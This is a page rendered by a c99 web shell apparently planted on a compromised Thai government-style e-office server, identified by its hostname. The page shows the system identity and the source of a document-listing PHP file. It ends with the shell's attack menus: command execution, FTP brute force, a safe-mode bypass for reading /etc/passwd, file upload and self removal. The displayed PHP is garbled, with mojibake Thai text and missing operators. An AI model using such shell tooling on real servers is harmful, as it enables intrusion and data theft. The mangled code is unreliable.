!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/mistk/mistk/eoffice/admin/   drwxr-xr-x
Free 50.78 GB of 127.8 GB (39.73%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showSelectSendDoc.php (10.22 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
header
("content-type: application/x-javascript; charset=TIS-620");
?>
<script src="getinfo.js"></script>
<script>
function On_Year(DLCID,MaxDocGroup,DlcPS2,y){
    searchYear=y;
    if (searchYear.length == 4) {
        ShowInfoSendDoc(DLCID,MaxDocGroup,DlcPS2);
    }
}
</script>
<?php
include_once("../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../class/clsPerson.php";
include_once 
"../link/function.php";
include_once 
"../class/clsDocLinePosition.php";
include_once 
"../class/clsDocLineConfig.php";
include_once 
"../class/clsReceiveSendType.php";
include_once 
"../class/clsDocType.php";
include_once 
"../link/functionshow.php";
include_once 
"../class/clsDocattatchesTmp.php";
include_once 
"../class/clsDocuments.php";
include_once 
"../class/clsDocSpeedLevel.php";
include_once 
"../class/clsDocSecreLevel.php";
include_once 
"../class/clsDocReceiveSend.php";
include_once 
"../class/clsDocSendtoPsTmp.php";
include_once 
"funct.php";
include_once 
"../link/keyThai.php";
$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oPS = new person($oC);
$oDlc = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlc3 = new DocLineConfig($oC);
$oDlc4 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oDlp1 = new docLinePosition($oC);
$oDlp2 = new docLinePosition($oC);
$oRSt = new receiveSendType($oC);
$oDt = new doctype($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDoc = new Documents($oC);
$oDoc1 = new Documents($oC);
$oDoc2 = new Documents($oC);
$oDoc3 = new Documents($oC);
$oDoc4 = new Documents($oC);
$oDoc5 = new Documents($oC);
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
$oDsl2 = new DocSpeedLevel($oC);
$oDcl2 = new DocSecretLevel($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs4 = new DocReceiveSend($oC);
$oRs5 = new DocReceiveSend($oC);
$oRs6 = new DocReceiveSend($oC);
$oRs7 = new DocReceiveSend($oC);
$oStmp=new DocSendToPsTmp($oC);
$MaxDocGroup=$oDP->SearchMaxDocGroup();
$InputThai=$oSys->SearchByInputThai();
$oDlc->SearchByKey($DLCID); $oDlc->GetRecord();
$oDlp1->SearchByKey($oDlc->DlpID);  $oDlp1->GetRecord();
if(
$oDlp1->DlpPID!="0"){ 
            
//$DlcPS2=$DLCID;
            
$DlcPS2=$oDlc2->SearchDlc2($oDlc->DlcSeq,$oDlp1->DlpPID,$oDlc->deptId);
}else{
            
$DlcPS2=$oDlc2->SearchDlc2($oDlc->DlcSeq,$oDlp1->DlpPID,$oDlc->deptId);
}
?>
 <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"  style="border-collapse:collapse">
            <tr><td align="right"><font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">
            ¤é¹ËÒ˹ѧÊ×Í (àÃ×èͧ/ÇèÒ´éÇÂ)</font>&nbsp;<input name="searchName" type="text" size="25" value="<?php echo a2th($searchName); ?>"><font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">&nbsp;(·Õè/©ºÑº·Õè/¤ÃÑ駷Õè/àÅ¢·Õè)</font>&nbsp;<input name="searchNo" type="text" size="20" value="<?php echo a2th($searchNo); ?>">&nbsp;&nbsp;
            <br>»ÃШÓà´×͹</font>&nbsp;
            <select name="monthe" onChange="ShowInfoSendDoc('<?php echo $DLCID?>','<?php echo $MaxDocGroup?>','<?php echo $DlcPS2;  ?>','<? echo $page_id?>')">
                <option value="01" <?php if($monthe=="01"){ echo "selected";   }?>>Á.¤.</option>
                <option value="02" <?php if($monthe=="02"){ echo "selected";   }?>>¡.¾.</option>
                <option value="03" <?php if($monthe=="03"){ echo "selected";   }?>>ÁÕ.¤.</option>
                <option value="04" <?php if($monthe=="04"){ echo "selected";   }?>>àÁ.Â.</option>
                <option value="05" <?php if($monthe=="05"){ echo "selected";   }?>>¾.¤.</option>
                <option value="06" <?php if($monthe=="06"){ echo "selected";   }?>>ÁÔ.Â.</option>
                <option value="07" <?php if($monthe=="07"){ echo "selected";   }?>>¡.¤.</option>
                <option value="08" <?php if($monthe=="08"){ echo "selected";   }?>>Ê.¤.</option>
                <option value="09" <?php if($monthe=="09"){ echo "selected";   }?>>¡.Â.</option>
                <option value="10" <?php if($monthe=="10"){ echo "selected";   }?>>µ.¤.</option>
                <option value="11" <?php if($monthe=="11"){ echo "selected";   }?>>¾.Â.</option>
                <option value="12" <?php if($monthe=="12"){ echo "selected";   }?>>¸.¤.</option>
              </select>
                    &nbsp;<input name="searchYear" type="text" size="5" maxlength="5" value=<?php if($searchYear!=""){  echo a2th($searchYear);  }else{  echo a2th(Date('Y')+543); } ?> onKeyUp="On_Year('<?php echo $DLCID?>','<?php echo $MaxDocGroup?>','<?php echo $DlcPS2;  ?>')" onKeyPress="event.keyCode=CheckInput(event.keyCode,'<?php echo $InputThai?>'); return event.keyCode;">
                    <input name="searchNamesub" type="button" value="¤é¹ËÒ" onClick="ShowInfoSendDoc('<?php echo $DLCID?>','<?php echo $MaxDocGroup?>','<?php echo $DlcPS2;  ?>')">&nbsp;&nbsp;</td></tr>
            </table>
          <table width="100%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA"  style="border-collapse:collapse"  background="<?php if($DtID=="5" || $DtID=="6" || $DtID=="7" || $DtID=="9" || $DtID=="10" || $DtID=="11" || $DtID=="12" || $DtID=="13"){ echo "../picture/table_header_bg6.gif"; }else{ echo "../picture/table_header_bg5.gif";  }?>">
             <?php  $flagshow=1;?>
              <tr height=22>
              <td width="15%" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>·Õè/©ºÑº·Õè/¤ÃÑ駷Õè/àÅ¢·Õè</strong></font></td>
      <td width="10%" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>¨Ò¡/·ÕèÁÒ&nbsp;(µé¹àÃ×èͧ)</strong></font></td>
      <td width="23%" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>àÃ×èͧ/ÇèÒ´éÇ (ª¹Ô´Ë¹Ñ§Ê×Í)</strong></font></td>
       <td width="13%" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>Çѹ·ÕèÊ觶֧¼ÙéÃѺ¼Ô´ªÍº</strong></font></td>
        </tr>
          
          <?php
                          
//--------------------------------find count
                        
$numrow=0;
                        
$oRs4->SearchByDlcIDDocGroupDsID31DlcPS2DrsSendDatesearchNo($DLCID,$MaxDocGroup,$DlcPS2,$monthe,th2a($searchYear),th2a($searchName),th2a($searchNo));        
                        
$numRow $oRs4->NumRow();
                        
//echo "===========".$numRow;
                        
$page_size 10;
                        
$total_page = (int)($numRow/$page_size);
                        if((
$numRow%$page_size) != 0)
                            
$total_page++;

                        if(isset(
$page_id))
                            
$start $page_size*($page_id-1);
                        else {
                            
$page_id 1;
                            
$start 0;
                        }
                        
//echo "numrow=".$numrow;
                        //-------------------------------
                
$numrow=0;
                
//echo "ans==".$DLCID."-".$MaxDocGroup." DlcPS2-".$DlcPS2."-monthe=".$monthe." searchYear=-".th2a($searchYear)."-".$s."-".th2a($searchName)."-".th2a($searchNo);
                            
$oRs5->SearchByDlcIDDocGroupDsID31DlcPS2LimitDrsSendDatesearchNo($DLCID,$MaxDocGroup,$DlcPS2$start$page_size,$monthe,th2a($searchYear),th2a($searchName),th2a($searchNo));            
            
$z=0;                
            while(
$oRs5->GetRecord()){ 
            
                            
$oDoc3->SearchByKey($oRs5->DocID);
                            
$oDoc3->GetRecord();
                            if((
$z%2) == 0)   
                                              echo 
"<tr bgcolor=\"#FFFFFF\" height=22 >";
                                        else
                                              echo 
"<tr bgcolor=\"".$GLOBALS["COLOR_BG_TD_16"]."\"  height=22>";
            
?>
         <td width="13%">&nbsp;<?php  echo $oDoc3->DocNo?></td>
      <td width="18%" >
       <?php 
       
if($oDoc3->DtID=="1" || $oDoc3->DtID=="2" || $oDoc3->DtID=="14"){        
                        echo 
"&nbsp;".$oDoc3->DocFrom."<br>";
       }else{
              if(
$oDoc3->DocPID=="0"){
                    
$oDlc2->SearchByKey($oDoc3->DlcID); $oDlc2->GetRecord();
                    
$oDlp->SearchByKey($oDlc2->DlpID);  $oDlp->GetRecord();
                    echo 
"&nbsp;".$oDoc3->DocFrom."<br>";
                    echo 
"&nbsp;(".$oDlp->DlpName.")";
            }else{
                    
$oDoc5->SearchByKey($oDoc3->DocPID); $oDoc5->GetRecord();
                    
$oDlc2->SearchByKey($oDoc5->DlcID); $oDlc2->GetRecord();
                    
$oDlp->SearchByKey($oDlc2->DlpID);  $oDlp->GetRecord();                
                    echo 
"&nbsp;".$oDoc3->DocFrom."<br>";
                    echo 
"&nbsp;(".$oDlp->DlpName.")";
            }
        }
        if(
$oDoc3->RsID!='2'){ $fn="showDetailSendDoc.php"; }else{   $fn="showDetailSendDocSR.php";}
      
?>
      </td>
                  <td width="30%">&nbsp; <a href="<?php echo $fn?>?DocID=<?php echo $oDoc3->DocID;?>&DrsID=<?php echo $oRs5->DrsID?>&flagshow=<?php echo $flagshow?>&monthe=<?php echo $monthe;?>&searchYear=<?php echo $searchYear?>&searchName=<?php echo $searchName?>&searchNo=<?php echo $searchNo?>"> 
                    <?php  echo $oDoc3->DocSubject;  ?>
                    </a> &nbsp; <font color="<?php echo $GLOBALS["COLOR_FONT_5"]; ?>" size="2"> 
                    <?php $oDt->SearchByKey($oDoc3->DtID); $oDt->GetRecord(); echo "(".$oDt->DtName.")";  ?>
                    </font> &nbsp; 
                    <?php  if($oDlp1->DlpPID!="0"){   if($DLCID==$oRs5->DlcID){   echo "&nbsp;<font color=\"#029b0a\"><storng>[ÃÑ¡ÉÒ¡ÒÃ]</strong></font>"; }} ?>
                    <?php  if($oDlp1->DlpPID=="0"){   if($DlcPS2==$oRs5->DlcID){   echo "&nbsp;<font color=\"#029b0a\"><storng>[ÃÑ¡ÉÒ¡ÒÃ]</strong></font>"; }} ?>
                  </td>
      <td align="center"> 
      <?php 
      
if($oRs5->DrsSendDate!="0000-00-00 00:00:00"){
                  list(
$DocD,$DocT) = split(' ',$oRs5->DrsSendDate);
                echo 
abbreDate2($DocD,'/')."<br>".a2th($DocT);
        }
        
?>
        </td>
          </tr>
          <?php
           $z
++;  }   ?> 
           <?php if($z=="0"){?>
          <tr height=22><td align="center" bgcolor="#FFFFFF" colspan="4"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">** äÁèÁÕÃÒ¡ÒÃ˹ѧÊ×Í·ÕèÊ觶֧¼ÙéÃѺ¼Ô´ªÍºáÅéÇ **</font></td></tr>
          <?php }  ?>
           <tr height=22 bgcolor="#DADADA"><td align="right" colspan="7"><strong>˹éÒ-&gt;</strong>
<?php 
                    
for ($num=1$num<=$total_page$num++) {    
                        if(
$num == $page_id)
                            echo  
a2th($num)." ";
                        else {
?>
                            <a href="sendDoc.php?page_id=<?php echo $num;?>&flagshow=<?php echo $flagshow?>&monthe=<?php echo $monthe;?>&searchYear=<?php echo $searchYear?>&searchName=<?php echo $searchName?>&searchNo=<?php echo $searchNo?>"><?php echo '[ 'a2th($num).' ]'; if($num==14){echo "<br>";}?></a>
<?php
                        
}
                    }
?>&nbsp;&nbsp;</td></tr>
          
          </table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0156 ]--